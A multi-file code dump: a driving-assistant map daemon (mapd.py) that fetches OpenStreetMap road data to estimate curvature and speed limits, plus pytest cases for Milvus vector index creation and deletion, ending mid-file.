self.log_view.notification_message = "The script is finished"
self.log_view.request_notification_permission(callback)
def execute_logger(self, next):
if self.args.output_file is not None:
self.log_file.open()
next()
self.log_file.close()
else:
next()
|
mapd.py
|
#!/usr/bin/env python3
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from scipy import spatial
#DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
#from selfdrive.mapd import default_speeds_generator
#default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)
import time
import zmq
import requests
import threading
import numpy as np
import overpy
#from common.params import Params
from collections import defaultdict
from common.transformations.coordinates import geodetic2ecef
import selfdrive.mapd.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
OVERPASS_API_URL = "https://z.overpass-api.de/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def connected_to_internet(url='https://z.overpass-api.de/api/interpreter', timeout=5):
try:
requests.get(url, timeout=timeout)
return True
except (requests.ReadTimeout, requests.ConnectionError):
print("No internet connection available.")
return False
def build_way_query(lat, lon, radius=50):
"""Builds a query to find all highways within a given radius around a point"""
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
lat_lon = "(%f,%f)" % (lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;""" + """is_in""" + lat_lon + """;area._[admin_level~"[24]"];
convert area ::id = id(), admin_level = t['admin_level'],
name = t['name'], "ISO3166-1:alpha2" = t['ISO3166-1:alpha2'];out;
"""
return q
def query_thread():
global last_query_result, last_query_pos, cache_valid
#api = overpy.Overpass(url=OVERPASS_API_URL, headers=OVERPASS_HEADERS, timeout=20.)
api = overpy.Overpass(url=OVERPASS_API_URL)
while True:
time.sleep(1)
if last_gps is not None:
fix_ok = last_gps.flags & 1
if not fix_ok:
continue
if last_query_pos is not None:
cur_ecef = geodetic2ecef((last_gps.latitude, last_gps.longitude, last_gps.altitude))
prev_ecef = geodetic2ecef((last_query_pos.latitude, last_query_pos.longitude, last_query_pos.altitude))
dist = np.linalg.norm(cur_ecef - prev_ecef)
if dist < 3000: #updated when we are 1km from the edge of the downloaded circle
continue
if dist > 4000:
cache_valid = False
q = build_way_query(last_gps.latitude, last_gps.longitude, radius=4000)
if connected_to_internet():
try:
new_result = api.query(q)
# Build kd-tree
nodes = []
real_nodes = []
node_to_way = defaultdict(list)
location_info = {}
for n in new_result.nodes:
nodes.append((float(n.lat), float(n.lon), 0))
real_nodes.append(n)
for way in new_result.ways:
for n in way.nodes:
node_to_way[n.id].append(way)
for area in new_result.areas:
if area.tags.get('admin_level', '') == "2":
location_info['country'] = area.tags.get('ISO3166-1:alpha2', '')
if area.tags.get('admin_level', '') == "4":
location_info['region'] = area.tags.get('name', '')
nodes = np.asarray(nodes)
nodes = geodetic2ecef(nodes)
tree = spatial.cKDTree(nodes)
query_lock.acquire()
last_query_result = new_result, tree, real_nodes, node_to_way, location_info
last_query_pos = last_gps
cache_valid = True
query_lock.release()
except Exception as e:
print(e)
query_lock.acquire()
last_query_result = None
query_lock.release()
else:
query_lock.acquire()
last_query_result = None
query_lock.release()
def save_gps_data(gps):
try:
location = [gps.speed, gps.bearing, gps.latitude, gps.longitude, gps.altitude, gps.accuracy, time.time()]
with open("/data/openpilot/selfdrive/data_collection/gps-data", "a") as f:
f.write("{}\n".format(location))
except:
pass
def mapsd_thread():
global last_gps
context = zmq.Context()
poller = zmq.Poller()
gps_external_sock = messaging.sub_sock(context, 8032, poller, conflate=True)
map_data_sock = messaging.pub_sock(context, 8065)
traffic_data_sock = messaging.sub_sock(context, 8208, poller, conflate=True)
cur_way = None
curvature_valid = False
curvature = None
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
speedLimittraffic = 0
speedLimittraffic_prev = 0
max_speed = None
max_speed_ahead = None
max_speed_ahead_dist = None
max_speed_prev = 0
speedLimittrafficvalid = False
while True:
gps_ext = None
traffic = None
for socket, event in poller.poll(0):
if socket is gps_external_sock:
gps_ext = messaging.recv_one(socket)
elif socket is traffic_data_sock:
traffic = messaging.recv_one_arne182(socket)
if traffic is not None:
if traffic.liveTrafficData.speedLimitValid:
speedLimittraffic = traffic.liveTrafficData.speedLimit
if abs(speedLimittraffic_prev - speedLimittraffic) > 0.1:
speedLimittrafficvalid = True
speedLimittraffic_prev = speedLimittraffic
if traffic.liveTrafficData.speedAdvisoryValid:
speedLimittrafficAdvisory = traffic.liveTrafficData.speedAdvisory
speedLimittrafficAdvisoryvalid = True
else:
speedLimittrafficAdvisoryvalid = False
else:
speedLimittrafficAdvisoryvalid = False
speedLimittrafficvalid = False
if gps_ext is not None:
gps = gps_ext.gpsLocationExternal
else:
continue
save_gps_data(gps)
last_gps = gps
fix_ok = gps.flags & 1
if gps.accuracy > 2.0:
fix_ok = False
if not fix_ok or last_query_result is None or not cache_valid:
cur_way = None
curvature = None
max_speed_ahead = None
max_speed_ahead_dist = None
curvature_valid = False
upcoming_curvature = 0.
dist_to_turn = 0.
road_points = None
map_valid = False
else:
map_valid = True
lat = gps.latitude
lon = gps.longitude
heading = gps.bearing
speed = gps.speed
query_lock.acquire()
cur_way = Way.closest(last_query_result, lat, lon, heading, cur_way)
if cur_way is not None:
pnts, curvature_valid = cur_way.get_lookahead(lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
if pnts is not None:
xs = pnts[:, 0]
ys = pnts[:, 1]
road_points = [float(x) for x in xs], [float(y) for y in ys]
if speed < 5:
curvature_valid = False
if curvature_valid and pnts.shape[0] <= 3:
curvature_valid = False
else:
curvature_valid = False
upcoming_curvature = 0.
curvature = None
dist_to_turn = 0.
# The curvature is valid when at least MAPS_LOOKAHEAD_DISTANCE of road is found
if curvature_valid:
# Compute the curvature for each point
with np.errstate(divide='ignore'):
circles = [circle_through_points(*p) for p in zip(pnts, pnts[1:], pnts[2:])]
circles = np.asarray(circles)
radii = np.nan_to_num(circles[:, 2])
radii[radii < 15.] = np.inf
try:
if cur_way.way.tags['highway'] == 'trunk':
radii = radii*1.6 # https://media.springernature.com/lw785/springer-static/image/chp%3A10.1007%2F978-3-658-01689-0_21/MediaObjects/298553_35_De_21_Fig65_HTML.gif
if cur_way.way.tags['highway'] == 'motorway' or cur_way.way.tags['highway'] == 'motorway_link':
radii = radii*2.8
except KeyError:
pass
curvature = 1. / radii
# Index of closest point
closest = np.argmin(np.linalg.norm(pnts, axis=1))
dist_to_closest = pnts[closest, 0] # We can use x distance here since it should be close
# Compute distance along path
dists = list()
dists.append(0)
for p, p_prev in zip(pnts, pnts[1:, :]):
dists.append(dists[-1] + np.linalg.norm(p - p_prev))
dists = np.asarray(dists)
dists = dists - dists[closest] + dist_to_closest
dists = dists[1:-1]
close_idx = np.logical_and(dists > 0, dists < 500)
dists = dists[close_idx]
curvature = curvature[close_idx]
if len(curvature):
# TODO: Determine left or right turn
curvature = np.nan_to_num(curvature)
upcoming_curvature = np.amax(curvature)
dist_to_turn =np.amin(dists[np.logical_and(curvature >= np.amax(curvature), curvature <= np.amax(curvature))])
else:
upcoming_curvature = 0.
dist_to_turn = 999
query_lock.release()
dat = messaging.new_message()
dat.init('liveMapData')
if last_gps is not None:
dat.liveMapData.lastGps = last_gps
if cur_way is not None:
dat.liveMapData.wayId = cur_way.id
# Speed limit
max_speed = cur_way.max_speed(heading)
max_speed_ahead = None
max_speed_ahead_dist = None
if max_speed is not None:
max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(max_speed, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
else:
max_speed_ahead, max_speed_ahead_dist = cur_way.max_speed_ahead(speed*1.1, lat, lon, heading, MAPS_LOOKAHEAD_DISTANCE)
# TODO: anticipate T junctions and right and left hand turns based on indicator
if max_speed_ahead is not None and max_speed_ahead_dist is not None:
dat.liveMapData.speedLimitAheadValid = True
dat.liveMapData.speedLimitAhead = float(max_speed_ahead)
dat.liveMapData.speedLimitAheadDistance = float(max_speed_ahead_dist)
if max_speed is not None:
if abs(max_speed - max_speed_prev) > 0.1:
speedLimittrafficvalid = False
max_speed_prev = max_speed
advisory_max_speed = cur_way.advisory_max_speed()
if speedLimittrafficAdvisoryvalid:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = speedLimittrafficAdvisory / 3.6
else:
if advisory_max_speed is not None:
dat.liveMapData.speedAdvisoryValid = True
dat.liveMapData.speedAdvisory = advisory_max_speed
# Curvature
dat.liveMapData.curvatureValid = curvature_valid
dat.liveMapData.curvature = float(upcoming_curvature)
dat.liveMapData.distToTurn = float(dist_to_turn)
if road_points is not None:
dat.liveMapData.roadX, dat.liveMapData.roadY = road_points
if curvature is not None:
dat.liveMapData.roadCurvatureX = [float(x) for x in dists]
dat.liveMapData.roadCurvature = [float(x) for x in curvature]
if speedLimittrafficvalid:
if speedLimittraffic > 0.1:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = speedLimittraffic / 3.6
map_valid = False
else:
speedLimittrafficvalid = False
else:
if max_speed is not None:
dat.liveMapData.speedLimitValid = True
dat.liveMapData.speedLimit = max_speed
dat.liveMapData.mapValid = map_valid
map_data_sock.send(dat.to_bytes())
def main(gctx=None):
main_thread = threading.Thread(target=mapsd_thread)
main_thread.daemon = True
main_thread.start()
q_thread = threading.Thread(target=query_thread)
q_thread.daemon = True
q_thread.start()
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
test_index.py
|
import logging
import time
import pdb
import copy
import threading
from multiprocessing import Pool, Process
import numpy
import pytest
import sklearn.preprocessing
from utils.utils import *
from common.constants import *
uid = "test_index"
BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
query, query_vecs = gen_query_vectors(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index on field not existed
expected: error raised
'''
tmp_field_name = gen_unique_str()
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_on_field(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
'''
tmp_field_name = "int64"
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_without_connect(self, dis_connect, collection):
'''
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.create_index(collection, field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq):
'''
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
'''
connect.insert(collection, default_entities)
def build(connect):
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_index_collection_not_existed(self, connect):
'''
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index
, make sure the collection name not in index
expected: create index failed
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_insert_flush(self, connect, collection, get_simple_index):
'''
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
'''
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
connect.create_index(collection, field_name, get_simple_index)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type":"L2", "index_type": "FLAT", "params":{"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_B(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
create_target_index(indexs[-1], field_name)
assert index == indexs[-1]
# assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_ip(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_ip(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq):
'''
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
'''
metric_type = "IP"
result = connect.insert(collection, default_entities)
connect.flush([collection])
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, metric_type=metric_type, search_params=search_param)
res = connect.search(collection, query)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
'''
connect.insert(collection, default_entities)
def build(connect):
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_collection_not_existed_ip(self, connect, collection):
'''
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, create index failed
'''
collection_name = gen_unique_str(uid)
default_index["metric_type"] = "IP"
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_insert_ip(self, connect, collection):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add entities in it
expected: return code equals to 0
'''
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly_ip(self, connect, collection):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_ip(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
default_index["metric_type"] = "IP"
indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_index(self, connect, collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
'''
# result = connect.insert(collection, entities)
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self, dis_connect, collection):
'''
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_index_collection_not_existed(self, connect):
'''
target: test drop index interface when collection name not existed
method: create collection and add entities in it, create index
, make sure the collection name not in index, and then drop it
expected: return code not equals to 0, drop index failed
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.drop_index(collection_name, field_name)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_index_collection_not_create(self, connect, collection):
'''
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
'''
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, connect, collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
'''
# result = connect.insert(collection, entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
'''
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self, dis_connect, collection):
'''
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self, connect, collection):
'''
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
'''
# result = connect.insert(collection, entities)
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
'''
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
get_simple_index["metric_type"] = "IP"
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_PQ_without_nbits(self, connect, collection):
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, PQ_index)
index = connect.describe_index(collection, "")
create_target_index(PQ_index, field_name)
assert index == PQ_index
class TestIndexBinary:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_l2_index(self, request, connect):
request.param["metric_type"] = "L2"
return request.param
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, binary_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(binary_collection, default_binary_entities)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, binary_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq):
'''
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
'''
nq = get_nq
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.load_collection(binary_collection)
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, nq, metric_type="JACCARD")
search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD")
logging.getLogger().info(search_param)
res = connect.search(binary_collection, query, search_params=search_param)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index):
'''
target: test create index interface with invalid metric type
method: add entitys into binary connection, flash, create index with L2 metric type.
expected: return create_index failure
'''
# insert 6000 vectors
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
with pytest.raises(Exception) as e:
res = connect.create_index(binary_collection, binary_field_name, get_l2_index)
"""
******************************************************************
The following cases are used to test `describe_index` function
***************************************************************
"""
@pytest.mark.skip("repeat with test_create_index binary")
